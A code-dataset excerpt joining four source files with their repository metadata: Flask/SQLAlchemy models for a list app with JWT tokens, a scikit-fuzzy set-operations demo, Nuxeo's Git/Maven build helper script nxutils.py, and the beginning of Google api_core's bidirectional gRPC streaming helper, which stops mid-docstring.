import enum import uuid from datetime import datetime from decimal import Decimal from time import time import jwt from flask import current_app from flask_login import UserMixin from sqlalchemy import types from werkzeug.security import check_password_hash, generate_password_hash from application import database # TODO: make a script with the below commands # export PYTHONDONTWRITEBYTECODE=1 # flask db init # flask db migrate -m 'init db' (or any other change after init) # flask db upgrade (flask db downgrade) # echo '.schema' | sqlite3 database/application.db > database/database.sql # chown -R flask-list:root database # chmod 700 database # chmod 600 database/application.db class SqliteNumeric(types.TypeDecorator): impl = types.String(1000) def process_bind_param(self, value, dialect): return str(value) def process_result_value(self, value, dialect): return Decimal(value if value is not None else "0") class User(database.Model, UserMixin): user_id = database.Column( database.Integer, index=True, nullable=False, unique=True, primary_key=True ) email = database.Column( database.String(1000), index=True, nullable=False, unique=True ) password_hash = database.Column(database.String(128), nullable=False) active = database.Column(database.Boolean(), nullable=False) updated_on = database.Column( database.DateTime, nullable=False, default=datetime.utcnow, onupdate=datetime.utcnow, ) filter_ = database.Column(database.String(1000)) version_id = database.Column(database.String(32), nullable=False) __mapper_args__ = { "version_id_col": version_id, "version_id_generator": lambda version: uuid.uuid4().hex, } __table_args__ = {"sqlite_autoincrement": True} def __repr__(self): return f"<User id: {self.user_id} email: {self.email}>" def get_id(self): return str(self.user_id) def set_password(self, password): self.password_hash = generate_password_hash(password) def verify_password(self, password): return check_password_hash(self.password_hash, password) def get_token(self, subject, expires_in=600): claims = {"sub": subject, "id": self.user_id, "exp": time() + expires_in} key = current_app.config["SECRET_KEY"] return jwt.encode(claims, key, algorithm="HS256") @staticmethod def verify_token(token, subject): try: key = current_app.config["SECRET_KEY"] claims = jwt.decode(token, key, algorithms=["HS256"]) user_id = claims.get("id") if claims.get("sub") == subject else None if not user_id: return except jwt.InvalidTokenError: return return User.query.get(user_id) class Category(database.Model): category_id = database.Column( database.Integer, index=True, nullable=False, unique=True, primary_key=True ) name = database.Column( database.String(1000), index=True, nullable=False, unique=True ) filter_ = database.Column(database.String(1000), index=True, nullable=False) version_id = database.Column(database.String(32), nullable=False) # one to many: category <-> item items = database.relationship("Item", back_populates="category") __mapper_args__ = { "version_id_col": version_id, "version_id_generator": lambda version: uuid.uuid4().hex, } __table_args__ = {"sqlite_autoincrement": True} def __repr__(self): return f"<Category id: {self.category_id} name: {self.name}>" class Item(database.Model): item_id = database.Column( database.Integer, index=True, nullable=False, unique=True, primary_key=True ) name = database.Column( database.String(1000), index=True, nullable=False # not unique ) version_id = database.Column(database.String(32), nullable=False) # one to many: category <-> item category = database.relationship("Category", back_populates="items") category_id = database.Column( database.Integer, database.ForeignKey("category.category_id", ondelete="RESTRICT"), index=True, nullable=False, ) # many to many: list <-> item lists = database.relationship( "ListItem", back_populates="item", cascade="save-update, merge, delete", passive_deletes=True, ) __mapper_args__ = { "version_id_col": version_id, "version_id_generator": lambda version: uuid.uuid4().hex, } __table_args__ = ( database.UniqueConstraint("name", "category_id"), {"sqlite_autoincrement": True}, ) def __repr__(self): return f"<Item id: {self.item_id} name: {self.name}>" class List(database.Model): list_id = database.Column( database.Integer, index=True, nullable=False, unique=True, primary_key=True ) name = database.Column( database.String(1000), index=True, nullable=False, unique=True ) version_id = database.Column(database.String(32), nullable=False) # many to many: list <-> item items = database.relationship( "ListItem", back_populates="list_", cascade="save-update, merge, delete", passive_deletes=True, ) __mapper_args__ = { "version_id_col": version_id, "version_id_generator": lambda version: uuid.uuid4().hex, } __table_args__ = {"sqlite_autoincrement": True} def __repr__(self): return f"<List id: {self.list_id} name: {self.name}>" class ListItemType(enum.Enum): none = 0 selection = 1 number = 2 text = 3 def next(self): return ListItemType((self.value + 1) % 4) class ListItem(database.Model): list_id = database.Column( database.Integer, database.ForeignKey("list.list_id", ondelete="CASCADE"), index=True, nullable=False, primary_key=True, ) item_id = database.Column( database.Integer, database.ForeignKey("item.item_id", ondelete="CASCADE"), index=True, nullable=False, primary_key=True, ) type_ = database.Column("type", database.Enum(ListItemType), nullable=False) selection = database.Column("selection", database.Boolean, nullable=False) # number = database.Column("number", database.Numeric, nullable=False) number = database.Column("number", SqliteNumeric, nullable=False) text = database.Column("text", database.String(1000), nullable=False) version_id = database.Column(database.String(32), nullable=False) list_ = database.relationship("List", back_populates="items") item = database.relationship("Item", back_populates="lists") __mapper_args__ = { "version_id_col": version_id, "version_id_generator": lambda version: uuid.uuid4().hex, } __table_args__ = ( database.PrimaryKeyConstraint("list_id", "item_id"), {"sqlite_autoincrement": True}, ) def __repr__(self): return f"<ListItem list: {self.list_id} item: {self.item_id}>"
31.377193
83
0.66676
795a8cde653f35f1ec300e920ebadb2d4959688a
2,804
py
Python
fuzzy_logic/fuzzy_operations.py
Mu-L/TheAlgorithmsOfPython
f9aa4c996f6a9f40195cc9d5448141049dfb75e4
[ "MIT" ]
6
2020-06-23T11:56:55.000Z
2021-10-03T17:21:34.000Z
fuzzy_logic/fuzzy_operations.py
Avinash987/Python
2d3d660155241113b23e4ed810e05479b2fc4bba
[ "MIT" ]
3
2020-06-08T07:03:15.000Z
2020-06-08T08:41:22.000Z
fuzzy_logic/fuzzy_operations.py
Avinash987/Python
2d3d660155241113b23e4ed810e05479b2fc4bba
[ "MIT" ]
2
2021-03-22T17:01:30.000Z
2021-08-12T17:06:12.000Z
"""README, Author - Jigyasa Gandhi(mailto:jigsgandhi97@gmail.com) Requirements: - scikit-fuzzy - numpy - matplotlib Python: - 3.5 """ import numpy as np import skfuzzy as fuzz if __name__ == "__main__": # Create universe of discourse in Python using linspace () X = np.linspace(start=0, stop=75, num=75, endpoint=True, retstep=False) # Create two fuzzy sets by defining any membership function # (trapmf(), gbellmf(), gaussmf(), etc). abc1 = [0, 25, 50] abc2 = [25, 50, 75] young = fuzz.membership.trimf(X, abc1) middle_aged = fuzz.membership.trimf(X, abc2) # Compute the different operations using inbuilt functions. one = np.ones(75) zero = np.zeros((75,)) # 1. Union = max(µA(x), µB(x)) union = fuzz.fuzzy_or(X, young, X, middle_aged)[1] # 2. Intersection = min(µA(x), µB(x)) intersection = fuzz.fuzzy_and(X, young, X, middle_aged)[1] # 3. Complement (A) = (1- min(µA(x)) complement_a = fuzz.fuzzy_not(young) # 4. Difference (A/B) = min(µA(x),(1- µB(x))) difference = fuzz.fuzzy_and(X, young, X, fuzz.fuzzy_not(middle_aged)[1])[1] # 5. Algebraic Sum = [µA(x) + µB(x) – (µA(x) * µB(x))] alg_sum = young + middle_aged - (young * middle_aged) # 6. Algebraic Product = (µA(x) * µB(x)) alg_product = young * middle_aged # 7. Bounded Sum = min[1,(µA(x), µB(x))] bdd_sum = fuzz.fuzzy_and(X, one, X, young + middle_aged)[1] # 8. Bounded difference = min[0,(µA(x), µB(x))] bdd_difference = fuzz.fuzzy_or(X, zero, X, young - middle_aged)[1] # max-min composition # max-product composition # Plot each set A, set B and each operation result using plot() and subplot(). import matplotlib.pyplot as plt plt.figure() plt.subplot(4, 3, 1) plt.plot(X, young) plt.title("Young") plt.grid(True) plt.subplot(4, 3, 2) plt.plot(X, middle_aged) plt.title("Middle aged") plt.grid(True) plt.subplot(4, 3, 3) plt.plot(X, union) plt.title("union") plt.grid(True) plt.subplot(4, 3, 4) plt.plot(X, intersection) plt.title("intersection") plt.grid(True) plt.subplot(4, 3, 5) plt.plot(X, complement_a) plt.title("complement_a") plt.grid(True) plt.subplot(4, 3, 6) plt.plot(X, difference) plt.title("difference a/b") plt.grid(True) plt.subplot(4, 3, 7) plt.plot(X, alg_sum) plt.title("alg_sum") plt.grid(True) plt.subplot(4, 3, 8) plt.plot(X, alg_product) plt.title("alg_product") plt.grid(True) plt.subplot(4, 3, 9) plt.plot(X, bdd_sum) plt.title("bdd_sum") plt.grid(True) plt.subplot(4, 3, 10) plt.plot(X, bdd_difference) plt.title("bdd_difference") plt.grid(True) plt.subplots_adjust(hspace=0.5) plt.show()
26.961538
82
0.616619
795a8cef4cab09edebcf0ed7a03a55b0050f9701
23,345
py
Python
scripts/nxutils.py
sailfly/nuxeo
24aa96d078be77ce09973b08b38ee1498c0903bf
[ "Apache-2.0" ]
null
null
null
scripts/nxutils.py
sailfly/nuxeo
24aa96d078be77ce09973b08b38ee1498c0903bf
[ "Apache-2.0" ]
null
null
null
scripts/nxutils.py
sailfly/nuxeo
24aa96d078be77ce09973b08b38ee1498c0903bf
[ "Apache-2.0" ]
null
null
null
#!/usr/bin/env python """ (C) Copyright 2012-2013 Nuxeo SA (http://nuxeo.com/) and contributors. All rights reserved. This program and the accompanying materials are made available under the terms of the GNU Lesser General Public License (LGPL) version 2.1 which accompanies this distribution, and is available at http://www.gnu.org/licenses/lgpl-2.1.html This library is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more details. Contributors: Julien Carsique Utilities for Python scripts.""" import ConfigParser import errno import os import platform import re import shlex import shutil import subprocess import sys import time import urllib2 from zipfile import ZIP_DEFLATED, ZipFile from distutils.version import LooseVersion import warnings REQUIRED_GIT_VERSION = "1.8.4" SUPPORTED_GIT_ONLINE_URLS = "http://", "https://", "git://", "git@" DEFAULT_MP_CONF_URL = "https://raw.github.com/nuxeo/integration-scripts/master/marketplace.ini" class ExitException(Exception): def __init__(self, return_code, message=None): super(ExitException, self).__init__(message) self.return_code = return_code self.message = message def deprecated(func): '''This is a decorator which can be used to mark functions as deprecated. It will result in a warning being emitted when the function is used.''' def new_func(*args, **kwargs): warnings.warn("Call to deprecated function {}.".format(func.__name__), category=DeprecationWarning) return func(*args, **kwargs) new_func.__name__ = func.__name__ new_func.__doc__ = func.__doc__ new_func.__dict__.update(func.__dict__) return new_func # pylint: disable=R0902 class Repository(object): """Nuxeo repository manager. Provides recursive Git and Shell functions.""" def __init__(self, basedir, alias, dirmapping=True, is_nuxeoecm=True): assert_git_config() (self.basedir, self.driveletter, self.oldbasedir) = long_path_workaround_init(basedir, dirmapping) self.mp_dir = os.path.join(self.basedir, "marketplace") if not os.path.isdir(self.mp_dir): os.mkdir(self.mp_dir) self.alias = alias # find the remote URL os.chdir(self.basedir) remote_lines = check_output("git remote -v").split("\n") for remote_line in remote_lines: remote_alias, remote_url, _ = remote_line.split() if alias == remote_alias: break self.is_online = remote_url.startswith(SUPPORTED_GIT_ONLINE_URLS) if self.is_online: self.url_pattern = re.sub("(.*)nuxeo", r"\1module", remote_url) else: self.url_pattern = remote_url + "/module" self.modules = [] self.sub_modules = {} self.addons = [] self.optional_addons = [] self.is_nuxeoecm = is_nuxeoecm def cleanup(self): long_path_workaround_cleanup(self.driveletter, self.oldbasedir) # pylint: disable=C0103 @deprecated def eval_modules(self): """Set the list of Nuxeo addons in 'self.modules'.""" self.modules = self.retrieve_modules(self.basedir) @deprecated def eval_addons(self): """Set the list of Nuxeo addons in 'self.addons' and 'self.optional_addons'.""" addons_dir = os.path.join(self.basedir, "addons") self.addons = self.retrieve_modules(addons_dir) self.optional_addons = self.retrieve_modules(addons_dir, "pom-optionals.xml") def execute_on_modules(self, function, with_optionals=False): """Executes the given function on each first and second level modules of Nuxeo repository. 'function' the function to execute on module. 'with_optionals' weither or not we execute function on optionals (modules with pom-optionals.xml file) """ cwd = os.getcwd() os.chdir(self.basedir) if not self.modules and self.is_nuxeoecm: self.modules = self.retrieve_modules(self.basedir) # First level addons = ["addons", "addons-core"] for module in self.modules: function(module) # Second level - addons if module in addons: if not self.is_online: self.url_pattern = self.url_pattern.replace("module", "%s/module" % module) os.chdir(module) if module not in self.sub_modules and self.is_nuxeoecm: module_dir = os.path.join(self.basedir, module) self.sub_modules[module] = self.retrieve_modules(module_dir) # Handle optionals if with_optionals: self.sub_modules[module] = self.sub_modules[module] + self.retrieve_modules(module_dir, "pom-optionals.xml") for sub_module in self.sub_modules[module]: function(sub_module) os.chdir(self.basedir) if not self.is_online: self.url_pattern = self.url_pattern.replace("%s/module" % module, "module") os.chdir(cwd) @staticmethod def retrieve_modules(project_dir, pom_name = "pom.xml"): """Retrieve all modules of input Maven project and return it.""" modules = [] if os.path.exists(os.path.join(project_dir, pom_name)): log("Modules list calculated from the POM file %s/%s" % (project_dir, pom_name)) cwd = os.getcwd() os.chdir(project_dir) f = open(pom_name, "r") pom_content = f.read() modules = re.findall("<module>(.*?)</module>", pom_content) f.close() os.chdir(cwd) modules = sorted(set(modules)) return modules def git_pull(self, module, version, fallback_branch=None): """Git clone or fetch, then update. 'module': the Git module to run on. 'version': the version to checkout. 'fallback_branch': the branch to fallback on when 'version' is not found locally or remotely.""" repo_url = self.url_pattern.replace("module", module) cwd = os.getcwd() log("[%s]" % module) if os.path.isdir(module): os.chdir(module) system_with_retries("git fetch %s" % (self.alias)) else: system_with_retries("git clone %s --origin %s" % (repo_url, self.alias)) os.chdir(module) self.git_update(version, fallback_branch) os.chdir(cwd) def system_recurse(self, command, with_optionals=False): """Execute the given command on current and sub-modules. 'command': the command to execute. If 'with_optionals', also recurse on "optional" addons.""" cwd = os.getcwd() os.chdir(self.basedir) log("[.]") system(command) self.execute_on_modules(lambda module: self.system_module(command, module), with_optionals) os.chdir(cwd) @staticmethod def system_module(command, module): """Execute the given command on given module. 'command': the command to execute. 'module': the module into execute command.""" cwd = os.getcwd() os.chdir(module) log("[%s]" % module) system(command) os.chdir(cwd) def git_recurse(self, command, with_optionals=False): """Execute the given Git command on current and sub-modules. It ignores non Git repositories. 'command': the command to execute. If 'with_optionals', also recurse on "optional" addons.""" command = "git " + command cwd = os.getcwd() os.chdir(self.basedir) log("[.]") system(command) self.execute_on_modules(lambda module: self.git_module(command, module), with_optionals) os.chdir(cwd) @staticmethod def git_module(command, module): """Execute the given Shell command on the given module. It ignores non Git repositories. 'command': the command to execute. 'module': the Git sub-directory where to execute the command.""" cwd = os.getcwd() os.chdir(module) if os.path.isdir(".git"): log("[%s]" % module) system(command) os.chdir(cwd) def archive(self, archive, version=None, with_optionals=False): """Archive the sources of current and sub-repositories. 'archive': full path of archive to generate. 'version': version to archive, defaults to current version. If 'with_optionals', also recurse on "optional" addons.""" if version is None: version = self.get_current_version() archive_dir = os.path.join(os.path.dirname(archive), "sources") cwd = os.getcwd() os.chdir(self.basedir) if os.path.isdir(archive_dir): shutil.rmtree(archive_dir) os.mkdir(archive_dir) log("[.]") p = system("git archive %s" % version, wait=False) # pylint: disable=E1103 system("tar -C %s -xf -" % archive_dir, stdin=p.stdout) self.execute_on_modules(lambda module: self.archive_module(archive_dir, version, module), with_optionals) make_zip(archive, archive_dir) shutil.rmtree(archive_dir) os.chdir(cwd) @staticmethod def archive_module(archive_dir, version, module): """Archive the sources of a the given Git sub-directory. 'archive_dir': full path of archive to generate. 'version': version to archive, defaults to current version. 'module': the Git sub-directory to archive.""" cwd = os.getcwd() os.chdir(module) log("[%s]" % module) p = system("git archive --prefix=%s/ %s" % (module, version), wait=False) system("tar -C %s -xf -" % archive_dir, stdin=p.stdout) os.chdir(cwd) def git_update(self, version, fallback_branch=None): """Git update using checkout, stash (if needed) and rebase. 'version': the version to checkout. 'fallback_branch': the branch to fallback on when 'version' is not found locally or remotely.""" is_tag = version in check_output("git tag --list %s" % version).split() is_local_branch = version in check_output("git branch --list %s" % version).split() is_remote_branch = "%s/%s" % (self.alias, version) in check_output( "git branch -r --list %s/%s" % (self.alias, version)).split() if is_tag: system("git checkout %s -q" % version) elif is_local_branch: system("git checkout %s -q" % version) if is_remote_branch: system("git rebase -q --autostash %s/%s" % (self.alias, version)) elif is_remote_branch: system("git checkout --track -b %s %s/%s -q" % (version, self.alias, version), fallback_branch is None) elif fallback_branch: log("Branch %s not found, fallback on %s" % (version, fallback_branch)) self.git_update(fallback_branch) else: log("Branch %s not found" % version) log("") def get_mp_config(self, marketplace_conf, user_defaults = {}): """Return the Marketplace packages configuration.""" defaults = {'other_versions': None, 'prepared': 'False', 'performed': 'False', 'branched': 'False', "profiles": '', "auto_increment_policy": "auto_patch"} defaults.update(user_defaults) mp_config = ConfigParser.SafeConfigParser(defaults=defaults) if marketplace_conf is None: no_remote = True else: try: mp_config.readfp(urllib2.urlopen(marketplace_conf)) log("Read configuration from: '%s'" % marketplace_conf) no_remote = False except urllib2.URLError: no_remote = True except ValueError: no_remote = True mp_config = self.save_mp_config(mp_config, True, no_remote) return mp_config def save_mp_config(self, mp_config, read_first=False, fail_if_no_file=False): """Save the Marketplace packages configuration.""" configfile_path = os.path.join(self.mp_dir, "release.ini") if read_first and os.path.isfile(configfile_path): log("Read configuration from: '%s'" % configfile_path) mp_config.read(configfile_path) if fail_if_no_file and not os.path.isfile(configfile_path): raise ExitException(1, "Missing configuration: '%s'" % configfile_path) mp_config.write(open(configfile_path, 'w')) log("Configuration saved: '%s'" % configfile_path) return mp_config def clone_mp(self, marketplace_conf, fallback_branch=None): """Clone or update Nuxeo Package repositories. Returns the Nuxeo Packages configuration.""" if marketplace_conf == '': marketplace_conf = DEFAULT_MP_CONF_URL if not marketplace_conf: return os.chdir(self.mp_dir) user_defaults={} if self.is_nuxeoecm: user_defaults["nuxeo-branch"] = self.get_current_version() mp_config = self.get_mp_config(marketplace_conf, user_defaults) for marketplace in mp_config.sections(): self.git_pull(marketplace, mp_config.get(marketplace, "branch"), fallback_branch=fallback_branch) return mp_config def clone(self, version=None, fallback_branch=None, with_optionals=False, marketplace_conf=None): """Clone or update whole Nuxeo repository. 'version': the version to checkout; defaults to current version. 'fallback_branch': the branch to fallback on when 'version' is not found locally or remotely. If 'with_optionals', also clone/update "optional" addons. 'marketplace_conf': URL of configuration file listing the Marketplace repositories to clone or update.""" cwd = os.getcwd() os.chdir(self.basedir) log("[.]") system_with_retries("git fetch %s" % (self.alias)) if version is None: version = self.get_current_version() self.git_update(version, fallback_branch) if self.is_nuxeoecm: self.execute_on_modules(lambda module: self.clone_module(module, version, fallback_branch), with_optionals) self.clone_mp(marketplace_conf, fallback_branch) os.chdir(cwd) def clone_module(self, module, version, fallback_branch): # Ignore modules which are not Git sub-repositories if not os.path.isdir(module) or os.path.isdir(os.path.join(module, ".git")): self.git_pull(module, version, fallback_branch) @staticmethod def get_current_version(): """Return branch or tag version of current Git workspace.""" t = check_output("git describe --all").split("/") return t[-1] def mvn(self, commands, skip_tests=False, skip_ITs=False, profiles=None, dryrun=False): """Run Maven commands (install, package, deploy, ...) on the whole sources (including addons and all distributions) with the given parameters. 'commands': the commands to run. 'skip_tests': whether to skip or not the tests. 'skip_ITs': whether to skip or not the Integration Tests. 'profiles': comma-separated additional Maven profiles to use. If 'dryrun', then print command without executing them.""" skip_tests_param = "-fae" if skip_tests: skip_tests_param += " -DskipTests=true" if skip_ITs: skip_tests_param += " -DskipITs=true" profiles_param = [] if self.is_nuxeoecm: profiles_param += ["addons", "distrib"] if profiles: profiles_param += profiles.split(',') if profiles_param: profiles_param = " -P" + ','.join(profiles_param) else: profiles_param = "" system("mvn %s %s%s -Dnuxeo.tests.random.mode=BYPASS" % ( commands, skip_tests_param, profiles_param), delay_stdout=False, run=not dryrun) def log(message, out=sys.stdout): out.write(message + os.linesep) out.flush() # Can't this method be replaced with system? # pylint: disable=C0103 def check_output(cmd): """Return Shell command output.""" args = shlex.split(cmd) try: p = subprocess.Popen(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=platform.system() == "Windows") # pylint: disable=C0103 except OSError, e: log("$> " + cmd) if e.errno == errno.ENOENT: raise ExitException(1, "Command not found: '%s'" % args[0]) else: # re-raise unexpected exception raise out, err = p.communicate() retcode = p.returncode if retcode != 0: if err is None or err == "": err = out raise ExitException(retcode, "Command '%s' returned non-zero exit code (%s)\n%s" % (cmd, retcode, err)) return out.strip() # pylint: disable=R0912,R0913 def system(cmd, failonerror=True, delay_stdout=True, logOutput=True, wait=True, run=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE): """Shell execution. 'cmd': the command to execute. If 'failonerror', command execution failure raises an ExitException. If 'delay_stdout', output is flushed at the end of command execution. If not 'run', the command is only printed. If not 'wait', the process is executed in background and returned as 'p'. 'stdin', 'stdout', 'stderr' are only used if 'delay_stdout' is True. If not 'logOutput', output is only logged in case of exception. Only available if 'delay_stdout'""" log("$> " + cmd) if not run: return args = shlex.split(cmd) try: if delay_stdout: if logOutput: # Merge stderr with stdout stderr = subprocess.STDOUT p = subprocess.Popen(args, stdin=stdin, stdout=stdout, stderr=stderr, shell=platform.system() == "Windows") if wait: out, err = p.communicate() if logOutput: sys.stdout.write(out) sys.stdout.flush() else: logOutput = True p = subprocess.Popen(args, shell=platform.system() == "Windows") if wait: p.wait() except OSError, e: if e.errno == errno.ENOENT: raise ExitException(1, "Command not found: '%s'" % args[0]) else: # re-raise unexpected exception raise if not wait: return p # pylint: disable=E1103 retcode = p.returncode if retcode != 0: if failonerror: if logOutput: raise ExitException( retcode, "Command '%s' returned non-zero exit code (%s)" % (cmd, retcode)) else: if err is None or err == "": err = out raise ExitException( retcode, "Command '%s' returned non-zero exit code (%s)\n%s" % (cmd, retcode, err)) return retcode def system_with_retries(cmd, failonerror=True): """Shell execution with ten retries in case of failures. 'cmd': the command to execute. If 'failonerror', latest command execution failure raises an ExitException. """ retries = 0 while True: retries += 1 retcode = system(cmd, failonerror=False) if retcode == 0: return 0 elif retries > 10: return system(cmd, failonerror=failonerror) else: log("Error executing %s - retrying in 10 seconds..." % cmd, sys.stderr) time.sleep(10) def long_path_workaround_init(basedir, dirmapping=True): """Windows only. Try to map the 'basedir' to an unused drive letter to shorten path names.""" newdir = basedir driveletter = None if platform.system() == "Windows" and dirmapping: for letter in "GHIJKLMNOPQRSTUVWXYZ": if not os.path.isdir("%s:\\" % (letter,)): system("SUBST %s: \"%s\"" % (letter, basedir)) time.sleep(10) driveletter = letter newdir = driveletter + ":\\" break return newdir, driveletter, basedir def long_path_workaround_cleanup(driveletter, basedir): """Windows only. Cleanup the directory mapping if any.""" if driveletter is not None: os.chdir(basedir) system("SUBST %s: /D" % (driveletter,), failonerror=False) def assert_git_config(): """Check Git configuration.""" t = check_output("git --version").split()[-1] if LooseVersion(t) < LooseVersion(REQUIRED_GIT_VERSION): raise ExitException(1, "Requires Git version %s+ (detected %s)" % (REQUIRED_GIT_VERSION, t)) try: t = check_output("git config --get-all color.branch") except ExitException, e: # Error code 1 is fine (default value) if e.return_code > 1: log("[WARN] %s" % e.message, sys.stderr) try: t += check_output("git config --get-all color.status") except ExitException, e: # Error code 1 is fine (default value) if e.return_code > 1: log("[WARN] %s" % e.message, sys.stderr) if "always" in t: raise ExitException(1, "The git color mode must not be always, try:" + "\n git config --global color.branch auto" + "\n git config --global color.status auto") def make_zip(archive, rootdir=None, basedir=None, mode="w"): """Create a zip file from all the files under 'rootdir'/'basedir'. If 'rootdir' is not specified, it uses the current directory. If 'basedir' is not specified, it uses the current directory constant '.'. The 'mode' must be 'w' (write) or 'a' (append).""" cwd = os.getcwd() if rootdir is not None: os.chdir(rootdir) try: if basedir is None: basedir = os.curdir log("Creating %s with %s ..." % (archive, basedir)) zipfile = ZipFile(archive, mode, compression=ZIP_DEFLATED) for dirpath, _, filenames in os.walk(basedir): for name in filenames: path = os.path.normpath(os.path.join(dirpath, name)) if os.path.isfile(path): zipfile.write(path, path) log("Adding %s" % path) zipfile.close() finally: if rootdir is not None: os.chdir(cwd) def extract_zip(archive, outdir=None): """Extract a zip file. Extracts all the files to the 'outdir' directory (defaults to current dir) """ zipfile = ZipFile(archive, "r") if outdir is None: outdir = os.getcwd() zipfile.extractall(outdir) zipfile.close()
39.567797
120
0.612123
795a8d295f17c93092538799177e206f9211bb32
22,182
py
Python
api_core/google/api_core/bidi.py
erikwebb/google-cloud-python
288a878e9a07239015c78a193eca1cc15e926127
[ "Apache-2.0" ]
3
2019-03-03T14:16:17.000Z
2020-01-22T20:39:11.000Z
api_core/google/api_core/bidi.py
erikwebb/google-cloud-python
288a878e9a07239015c78a193eca1cc15e926127
[ "Apache-2.0" ]
1
2021-04-30T20:46:36.000Z
2021-04-30T20:46:36.000Z
api_core/google/api_core/bidi.py
erikwebb/google-cloud-python
288a878e9a07239015c78a193eca1cc15e926127
[ "Apache-2.0" ]
1
2020-11-15T11:44:36.000Z
2020-11-15T11:44:36.000Z
# Copyright 2017, Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Bi-directional streaming RPC helpers.""" import logging import threading from six.moves import queue from google.api_core import exceptions _LOGGER = logging.getLogger(__name__) _BIDIRECTIONAL_CONSUMER_NAME = "Thread-ConsumeBidirectionalStream" class _RequestQueueGenerator(object): """A helper for sending requests to a gRPC stream from a Queue. This generator takes requests off a given queue and yields them to gRPC. This helper is useful when you have an indeterminate, indefinite, or otherwise open-ended set of requests to send through a request-streaming (or bidirectional) RPC. The reason this is necessary is because gRPC takes an iterator as the request for request-streaming RPCs. gRPC consumes this iterator in another thread to allow it to block while generating requests for the stream. However, if the generator blocks indefinitely gRPC will not be able to clean up the thread as it'll be blocked on `next(iterator)` and not be able to check the channel status to stop iterating. This helper mitigates that by waiting on the queue with a timeout and checking the RPC state before yielding. Finally, it allows for retrying without swapping queues because if it does pull an item off the queue when the RPC is inactive, it'll immediately put it back and then exit. This is necessary because yielding the item in this case will cause gRPC to discard it. In practice, this means that the order of messages is not guaranteed. If such a thing is necessary it would be easy to use a priority queue. Example:: requests = request_queue_generator(q) call = stub.StreamingRequest(iter(requests)) requests.call = call for response in call: print(response) q.put(...) Note that it is possible to accomplish this behavior without "spinning" (using a queue timeout). One possible way would be to use more threads to multiplex the grpc end event with the queue, another possible way is to use selectors and a custom event/queue object. Both of these approaches are significant from an engineering perspective for small benefit - the CPU consumed by spinning is pretty minuscule. Args: queue (queue.Queue): The request queue. period (float): The number of seconds to wait for items from the queue before checking if the RPC is cancelled. In practice, this determines the maximum amount of time the request consumption thread will live after the RPC is cancelled. initial_request (Union[protobuf.Message, Callable[None, protobuf.Message]]): The initial request to yield. This is done independently of the request queue to allow fo easily restarting streams that require some initial configuration request. """ def __init__(self, queue, period=1, initial_request=None): self._queue = queue self._period = period self._initial_request = initial_request self.call = None def _is_active(self): # Note: there is a possibility that this starts *before* the call # property is set. So we have to check if self.call is set before # seeing if it's active. if self.call is not None and not self.call.is_active(): return False else: return True def __iter__(self): if self._initial_request is not None: if callable(self._initial_request): yield self._initial_request() else: yield self._initial_request while True: try: item = self._queue.get(timeout=self._period) except queue.Empty: if not self._is_active(): _LOGGER.debug( "Empty queue and inactive call, exiting request " "generator." ) return else: # call is still active, keep waiting for queue items. continue # The consumer explicitly sent "None", indicating that the request # should end. if item is None: _LOGGER.debug("Cleanly exiting request generator.") return if not self._is_active(): # We have an item, but the call is closed. We should put the # item back on the queue so that the next call can consume it. self._queue.put(item) _LOGGER.debug( "Inactive call, replacing item on queue and exiting " "request generator." ) return yield item class BidiRpc(object): """A helper for consuming a bi-directional streaming RPC. This maps gRPC's built-in interface which uses a request iterator and a response iterator into a socket-like :func:`send` and :func:`recv`. This is a more useful pattern for long-running or asymmetric streams (streams where there is not a direct correlation between the requests and responses). Example:: initial_request = example_pb2.StreamingRpcRequest( setting='example') rpc = BidiRpc(stub.StreamingRpc, initial_request=initial_request) rpc.open() while rpc.is_active(): print(rpc.recv()) rpc.send(example_pb2.StreamingRpcRequest( data='example')) This does *not* retry the stream on errors. See :class:`ResumableBidiRpc`. Args: start_rpc (grpc.StreamStreamMultiCallable): The gRPC method used to start the RPC. initial_request (Union[protobuf.Message, Callable[None, protobuf.Message]]): The initial request to yield. This is useful if an initial request is needed to start the stream. """ def __init__(self, start_rpc, initial_request=None): self._start_rpc = start_rpc self._initial_request = initial_request self._request_queue = queue.Queue() self._request_generator = None self._is_active = False self._callbacks = [] self.call = None def add_done_callback(self, callback): """Adds a callback that will be called when the RPC terminates. This occurs when the RPC errors or is successfully terminated. Args: callback (Callable[[grpc.Future], None]): The callback to execute. It will be provided with the same gRPC future as the underlying stream which will also be a :class:`grpc.Call`. """ self._callbacks.append(callback) def _on_call_done(self, future): for callback in self._callbacks: callback(future) def open(self): """Opens the stream.""" if self.is_active: raise ValueError("Can not open an already open stream.") request_generator = _RequestQueueGenerator( self._request_queue, initial_request=self._initial_request ) call = self._start_rpc(iter(request_generator)) request_generator.call = call # TODO: api_core should expose the future interface for wrapped # callables as well. if hasattr(call, "_wrapped"): # pragma: NO COVER call._wrapped.add_done_callback(self._on_call_done) else: call.add_done_callback(self._on_call_done) self._request_generator = request_generator self.call = call def close(self): """Closes the stream.""" if self.call is None: return self._request_queue.put(None) self.call.cancel() self._request_generator = None # Don't set self.call to None. Keep it around so that send/recv can # raise the error. def send(self, request): """Queue a message to be sent on the stream. Send is non-blocking. If the underlying RPC has been closed, this will raise. Args: request (protobuf.Message): The request to send. """ if self.call is None: raise ValueError("Can not send() on an RPC that has never been open()ed.") # Don't use self.is_active(), as ResumableBidiRpc will overload it # to mean something semantically different. if self.call.is_active(): self._request_queue.put(request) else: # calling next should cause the call to raise. next(self.call) def recv(self): """Wait for a message to be returned from the stream. Recv is blocking. If the underlying RPC has been closed, this will raise. Returns: protobuf.Message: The received message. """ if self.call is None: raise ValueError("Can not recv() on an RPC that has never been open()ed.") return next(self.call) @property def is_active(self): """bool: True if this stream is currently open and active.""" return self.call is not None and self.call.is_active() @property def pending_requests(self): """int: Returns an estimate of the number of queued requests.""" return self._request_queue.qsize() class ResumableBidiRpc(BidiRpc): """A :class:`BidiRpc` that can automatically resume the stream on errors. It uses the ``should_recover`` arg to determine if it 